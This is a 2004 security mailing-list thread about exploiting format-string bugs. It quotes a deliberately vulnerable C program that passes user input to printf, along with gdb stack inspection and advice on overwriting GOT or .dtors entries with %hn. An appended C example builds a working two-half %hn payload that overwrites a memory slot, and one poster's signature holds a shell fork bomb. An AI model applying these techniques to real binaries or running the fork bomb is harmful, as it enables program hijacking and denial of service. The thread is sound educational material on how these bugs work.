Vulnerability Development mailing list archives
Re: Help, problems finding addresses with format strings
From: Vade 79 <v9 () fakehalo deadpig org>
Date: 20 Feb 2004 06:21:14 -0000
In-Reply-To: <20040219132347.GA26946@x0riguer>

The idea is to use the data in the (any) buffer you can write to as a user in conjunction with %n/etc. formatting... You do not need to know the location of the buffer (vuln[1024]) you are using in this case, but you do need a location to write to (new memory address, anywhere in memory)... You usually will want to use %n/etc. to overwrite GOT (global offset table) function addresses or .dtors... which will give you control of the program.

So basically you use %x's, when testing, until you see the actual data in vuln[1024]... in your case it appears to be 4... Just to get you on the right track, there are several how-to's out there.. Google has many informative responses.

(By %n I really mean %hn; you will usually need to use half numbers and overwrite the address in two 16-bit (2-character) parts... this is the popular method used for generic format bugs.)

...sorry for my bad English, but I'm American :P
Hello,

Having some experience with BOF, I decided to read some docs about format string vulnerabilities, but... my surprise is that, for some reason, I can't find anything similar to this doc, and I'd like someone with experience to help me.

My system is a Debian GNU/Linux sid with gcc 3.3.3. Look at this simple (apparently) code:

---
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* bzero() */
#include <unistd.h>

int main(void)
{
    char vuln[1024];

    bzero(vuln, 1024);
    printf("vuln program\n\n");
    printf("enter some string:");
    fflush(stdout);
    read(0, vuln, 1024);
    printf(vuln);        /* user input used directly as the format string */
    return 0;
}
---

We compile it and execute it... When the program asks for a string, we want to guess the stack region:

enter some string:%x %x %x %x
bffff4d0 400 2 25207825

These addresses are:

[x0riguer]:~/Projects/fstrings$ gdb -q ./fsvuln
(gdb) disas main
Dump of assembler code for function main:
0x08048424 <main+0>:    push   %ebp
0x08048425 <main+1>:    mov    %esp,%ebp
0x08048427 <main+3>:    sub    $0x418,%esp
...
...
0x08048499 <main+117>:  call   0x8048328
0x0804849e <main+122>:  leave
0x0804849f <main+123>:  ret
End of assembler dump.
(gdb) break *0x08048499
Breakpoint 2 at 0x8048499: file fsvuln.c, line 16.
(gdb) r
Starting program: /home/yeyu/Projects/fstrings/fsvuln
vuln program

enter some string:%x %x %x %x

Breakpoint 2, 0x08048499 in main () at fsvuln.c:16
16        printf(vuln);
(gdb) x/10wx $esp
0xbffff4c0:     0xbffff4d0      0xbffff4d0      0x00000400      0x00000002
0xbffff4d0:     0x25207825      0x78252078      0x0a782520      0x00000000
0xbffff4e0:     0x00000000      0x00000000
...

* If we can guess the string at 0xbffff4d0...
...
(gdb) x/s 0xbffff4d0
0xbffff4d0:      "%x %x %x %x\n"

Now... I think that is where char vuln[1024] starts, at 0xbffff4d0, no? I want to overwrite this buffer and theoretically overwrite main's return address with another one.

1- How can I guess (theoretically and practically) this return address on the stack? (I think it is on the stack.)

2- When I have the value of the return address, I think I have to overwrite it with techniques like %8x and %n, isn't it?

Help me to solve this problem please...
Thank you

--
=-------------------------------------------------=
** yn0 [yeyuno () bigfoot com] **
=------[ echo "\$0&\$0">_;chmod +x _;./_ ]--------=
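The two-half %hn overwrite that Vade 79 describes, as an added C example that is not part of either message in this thread. It models the 32-bit target (a GOT entry or .dtors pointer on the i386 target discussed) with a global `got_slot`, and passes the two pointers to the printf call as explicit arguments rather than placing them in the user buffer at the stack offset found by %x probing (4 in the poster's case), so it runs on any ABI. The helper names (`pad_for`, `build_hn_payload`, `fire`, `overwrite_demo`) and the value 0x41424344 are my own choices.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for the 32-bit slot an attacker would aim %hn at on i386
 * (a GOT entry or a .dtors pointer). Hypothetical, constructed for the demo. */
uint32_t got_slot = 0xffffffffu;

typedef struct {
    char fmt[64];            /* "%<pad1>x%hn%<pad2>x%hn" */
    unsigned short *first;   /* pointer consumed by the first %hn */
    unsigned short *second;  /* pointer consumed by the second %hn */
} hn_payload;

/* Padding that makes the running character count equal target16 (mod 2^16).
 * A %Nx directive always emits at least one character, so 0 becomes 65536. */
size_t pad_for(unsigned target16, size_t written)
{
    size_t pad = (target16 - (written & 0xffffu)) & 0xffffu;
    return pad ? pad : 0x10000;
}

/* Build a format string that stores `value` into the 32-bit slot at `addr`
 * with two %hn writes, one per 16-bit half, smaller half first so that the
 * second write needs the least extra padding. `already_written` is the number
 * of characters emitted before the first %hn (e.g. the address bytes that
 * open a real payload). */
hn_payload build_hn_payload(void *addr, uint32_t value, size_t already_written)
{
    hn_payload p;
    union { uint32_t u; unsigned short h[2]; } probe = { 1 };
    int lo_index = (probe.h[0] == 1) ? 0 : 1;            /* host endianness */
    unsigned short *lo_addr = (unsigned short *)addr + lo_index;
    unsigned short *hi_addr = (unsigned short *)addr + (1 - lo_index);
    unsigned lo = value & 0xffffu, hi = value >> 16;

    unsigned v1 = lo, v2 = hi;
    p.first = lo_addr;
    p.second = hi_addr;
    if (hi < lo) { v1 = hi; v2 = lo; p.first = hi_addr; p.second = lo_addr; }

    size_t pad1 = pad_for(v1, already_written);
    size_t pad2 = pad_for(v2, already_written + pad1);
    snprintf(p.fmt, sizeof p.fmt, "%%%zux%%hn%%%zux%%hn", pad1, pad2);
    return p;
}

/* Feed the payload to printf-family code. The format is deliberately not a
 * literal: that is the bug being demonstrated, so the warning is silenced. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
#pragma GCC diagnostic ignored "-Wformat-security"
void fire(const hn_payload *p)
{
    size_t cap = 2 * 0x10000 + 64;        /* worst case: two 65536-wide fields */
    char *out = malloc(cap);
    if (!out) return;
    /* In the real bug these four arguments are whatever lies on the stack at
     * the offset found with %x probing; here they are supplied explicitly. */
    snprintf(out, cap, p->fmt, 0u, p->first, 0u, p->second);
    free(out);
}
#pragma GCC diagnostic pop

/* Reset the slot, run the overwrite, and return what the slot now holds. */
uint32_t overwrite_demo(uint32_t want)
{
    got_slot = 0xffffffffu;
    hn_payload p = build_hn_payload(&got_slot, want, 0);
    fire(&p);
    return got_slot;
}

int main(void)
{
    hn_payload p = build_hn_payload(&got_slot, 0x41424344u, 0);
    printf("format: %s\n", p.fmt);
    printf("slot after overwrite: 0x%08x\n", overwrite_demo(0x41424344u));
    return 0;
}
```

Because %hn stores only the low 16 bits of the running count, `pad_for` works modulo 65536 and the "smaller half first" ordering is only an optimisation of output length, not a correctness requirement; a value whose two halves are equal still works, at the cost of one 65536-character field.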
Current thread:
- Help, problems finding addresses with format strings YeYu (Feb 19)
- <Possible follow-ups>
- Re: Help, problems finding addresses with format strings Vade 79 (Feb 20)
- Re: Help, problems finding addresses with format strings Marco Ivaldi (Feb 20)